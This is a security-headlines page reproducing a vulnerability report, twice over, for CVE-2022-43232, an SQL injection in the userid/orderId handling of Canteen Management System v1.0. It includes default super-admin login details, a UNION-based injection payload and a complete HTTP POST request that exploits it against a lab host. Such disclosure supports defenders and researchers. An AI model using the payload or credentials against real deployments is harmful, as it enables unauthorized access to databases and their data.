Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-43232: bug_report/SQLi-2.md at main · HKD01l/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the userid parameter at /php_action/fetchOrderData.php.

CVE
#sql#vulnerability#windows#php#auth#firefox

Canteen Management System v1.0 by mayuri_k has SQL injection

BUG_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: [email protected]/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php_action/fetchOrderData.php

Vulnerability location: /youthappam/php_action/fetchOrderData.php, userid

dbname =youthappam,length=10

[+] Payload: orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 // Leak place —> userid

POST /youthappam/php_action/fetchOrderData.php HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 62 orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13

**# Canteen Management System v1.0 by mayuri_k has SQL injection

BUG_Author: QiaoRui feng

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: [email protected]/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php_action/fetchOrderData.php

Vulnerability location: /youthappam/php_action/fetchOrderData.php, userid

dbname =youthappam,length=10

[+] Payload: orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13 // Leak place —> userid

POST /youthappam/php_action/fetchOrderData.php HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 62 orderId=-1 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13

**

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda